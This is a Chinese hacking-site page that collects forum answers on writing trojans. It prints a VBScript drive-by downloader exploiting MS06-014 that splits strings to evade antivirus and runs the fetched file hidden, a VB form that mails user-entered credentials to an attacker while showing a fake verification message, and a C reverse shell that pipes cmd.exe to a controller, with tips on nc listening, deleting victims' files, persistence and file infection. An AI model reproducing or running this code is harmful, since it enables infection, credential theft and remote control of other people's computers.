当前位置:首页 > 网站入侵 > 正文内容

木马的代码(木马代码编写)

hacker3年前 (2022-05-30)网站入侵91
本文导读目录:

什么是木马代码?木马代码是用来干什么的?

木马是编写的一种远程控制恶意程序

木马会未经用户许可

记录用户的键盘录入

盗取用户银行账户

密码等信息

并将其发送给攻击者

网页木马代码大全

来晚了吗?……再复制一次吧……

要简洁……感觉复杂的话应该能免杀……

on error resume next '开启错误陷阱

dl = "" '定义“dl”为木马下载地址

Set df = document.createElement("object") '建立子元素

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 声明网马的clsid,这个是ms06014的

str="Microsoft.XMLHTTP" 使用XMLhttp对象

Set x = df.CreateObject(str,"") '用Adodb.Stream执行文件操作

a1="Ado" '下面这三个的作用是拆分字符串“Adodb.Stream”,躲过一些杀毒软件查杀

a2="db."

a3="Str"

a4="eam"

str1=a1a2a3a4 '合并字符串“Adodb.Stream”

str5=str1 '转移变量str1到str5

set S = df.createobject(str5,"") '执行文件操作

S.type = 1

str6="GET" '使用get方式获取木马文件

x.Open str6, dl, False '根据木马地址获取木马文件

x.Send

fname1="g0ld.com" '定义木马的文件名"g0ld.com"

set F = df.createobject("Scripting.FileSystemObject","") '用FileSystemObjec执行文件操作,这次是写入文件

set tmp = F.GetSpecialFolder(2) '获取临时文件夹路径

fname1= F.BuildPath(tmp,fname1) '下面这些是向临时文件夹中写入木马

S.open

S.write x.responseBody

S.savetofile fname1,2 '保存木马文件

S.close '关闭连接

set Q = df.createobject("Shell.Application","") '用Shell.Application运行木马文件

Q.ShellExecute fname1,"","","open",0 '以隐藏方式运行木马

问题补充:我真想飞起给楼下一脚~~~~~~~

最简单的木马 源代码以及解释

一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。

(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的 *** 载体。

(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。

(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的 *** 地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。

木马源代码

VB '油香接收 Private Sub Command1_Click() Timer1.Interval = 5000 On Error Resume Next f = ("xxxxxxxx") '发送邮箱 *** tp = ("xxxxxxx") '发送邮箱服务器 u = ("xxxxxxxx") '发送邮箱用户名 p = ("xxxxxx") '发送邮箱密码 t = ("xxxxxxxxx") '接收邮箱 m = Text1.Text '邮件标题 msg = Text2.Text 't邮件内容 NameSpace = " http://schemas.microsoft.com/cdo/configuration/" Set Email = CreateObject("CDO.Message") Email.From = f Email.To = t Email.Subject = m Email.Textbody = msg Email.AddAttachment j With Email.Configuration.Fields .Item(NameSpace "sendusing") = 2 .Item(NameSpace " *** tpserver") = *** tp .Item(NameSpace " *** tpserverport") = 25 .Item(NameSpace " *** tpauthenticate") = 1 .Item(NameSpace "sendusername") = u .Item(NameSpace "sendpassword") = p .Update End With Email.Send End Sub Private Sub Command2_Click() End End Sub Private Sub Timer1_Timer() If Text1.Text Text2.Text Text3.Text Text4.Text = "" Then MsgBox "请先输入!", vbInformation, "提示" Timer1.Enabled = False Else MsgBox "系统已经成功审核你的数据!{你的账号:[" + Form1.Text1.Text + "]", vbInformation, "提示" Text1.Text = "" Text2.Text = "" Timer1.Enabled = False End If End Sub

记得采纳啊

求一个简单木马的源代码。必须注明每个语句的作用。只为交作业。有的百度私信我

//一个简单木马的源代码

#include stdio.h

#include winsock2.h

#pragma comment(lib,"Ws2_32.lib")

void main()

{

WSADATA wsa;

SOCKET corky;

struct sockaddr_in add;

WSAStartup(MAKEWORD(2,2),wsa);//初始化

corky=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);//创建套接字corky

add.sin_family=AF_INET;//填充sockaddr_in结构

add.sin_port=htons(918); //换成你的端口

add.sin_addr.s_addr=inet_addr("127.0.0.1");//换成你的ip地址

connect(corky,(struct sockaddr *)add,sizeof(add)); //连接控制端

STARTUPINFO si; //创建STARTUPINFO结构

ZeroMemory(si,sizeof(si));//为STARTUPINFO结构分配内存

si.cb=sizeof(si);

si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//要使用的标志位

si.wShowWindow=SW_HIDE;//隐藏cmd.exe窗口

si.hStdInput=si.hStdOutput=si.hStdError=(void *)corky;//重定向输入输出到套接字corky

PROCESS_INFORMATION pi;

CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,si,pi);//创建cmd.exe进程

ExitProcess(0);

}

//用nc监听你的918端口(nc -l -p 918)然后耐心等待对方启动木马吧!

//提示:nc在《网友世界》2008 3月光盘中winowsPE系统的外挂程序中可以找到

//如果木马启动你在nc的窗口就会得到一个带微软版权的提示

//输入dir命令看看就会看到对方目录下的所有文件信息(木马所在目录)

//用del命令可以删除他的文件了

//不过还是有缺陷就是对方可以看到有一个cmd窗口笨蛋也知道中招了哈哈..

//到时警察叔叔来找你可别怪我提醒你呦!

//你可以完善它如向系统添加启动项让它随系统启动

//更好是感染文件让它随宿主的打开而启动

//你还要完善窗口的隐藏

//本代码在XP+VC++6.0下调试通过

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/163312.html

标签: 木马的代码

“木马的代码(木马代码编写)” 的相关文章

去年恶意勒索资金中有 74% 流向了俄罗斯有关黑客手中

一项新研究表明,2021 年通过勒索软件攻击方式牟取的所有资金中有 74% 流向了俄罗斯有关的黑客手中。研究人员说,价值超过 4 亿美元的加密货币支付给了“极有可能与俄罗斯有关联”的团体。研究人员还称,大量基于加密货币的洗钱活动是通过俄罗斯加密公司进行。 这项研究是由 Chainalysi...

Microsoft Defender 又一次误将 Google Chrome 更新视作可疑活动

近日,我们在 Twitter 和 Reddit 等平台上见到了不少系统管理员报告,可知问题主要集中在被 Microsoft Defender for Endpoint 安全防护软件标记为“可疑”的 Google Chrome 更新上。由于谷歌更新服务(GoogleUpdate.exe)没有给“goo...

YouTube上的 Valorant 骗局:RedLine 感染

Hackernews 编译,转载请注明出处: 韩国安全分析人士在YouTube上发现了一场恶意软件传播活动,攻击者使用Valorant当做诱饵,诱骗玩家下载RedLine——一个强大的信息窃取工具。 这种类型的滥用是相当普遍的,因为黑客发现绕过YouTube的新内容提交审核,或者在被举报和禁号时创...

新型芯片可防止黑客从智能设备中提取隐藏信息

一位最近出院的心脏病患者正在使用智能手表来帮助监测他的心电图信号。这款智能手表看起来非常安全,但处理该健康信息的神经网络使用的是私人数据,这些数据仍有可能被恶意代理通过侧信道攻击窃取。 边信道攻击试图通过间接利用一个系统或其硬件来收集秘密信息。在一种类型的边信道攻击中,精明的黑客可以在神经网络运行...

Facebook 的 Pages 漏洞让全球政客们可以伪造民众支持率以攻击对手

世界各地的政府和政客正在利用Facebook如何对不真实活动进行监管的漏洞,伪造民众支持率以骚扰对手。来自《卫报》的调查基于内部文件和前Facebook数据科学家Sophie Zhang的证词,显示了该公司如何选择性地选择对这种活动采取行动。 Facebook迅速采取行动,处理美国、韩国等富裕国家和...

美国土安全部要员的邮件账户受 SolarWinds 攻击事件影响

美联社报道称,美国土安全部门要员的电子邮件账户,亦受到了 SolarWinds 恶意软件活动的幕后黑手的影响。据悉,这批账户属于特朗普总统在 2019 年 11 月任命的代理国务卿 Chad Wolf,以及负责调查境外威胁的国土安全部官员。 早在 2020 年 12 月,FireEye 网络安全专...

评论列表

绿邪囍神
3年前 (2022-05-30)

器 u = ("xxxxxxxx") '发送邮箱用户名 p = ("xxxxxx") '发送邮箱密码 t = ("xxxxxxxxx") '接收邮箱 m = Text1.Text '邮件标题 msg =

拥嬉青朷
3年前 (2022-05-30)

码大全来晚了吗?……再复制一次吧……要简洁……感觉复杂的话应该能免杀……on error resume next '开启错误陷阱 dl = "" '定义“dl”为木马下载地址 Set

语酌怯朲
3年前 (2022-05-30)

2 '保存木马文件 S.close '关闭连接 set Q = df.createobject("Shell.Application","") '用Shell.Application运行木马文件 Q.ShellExecute fname1,"","","op

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。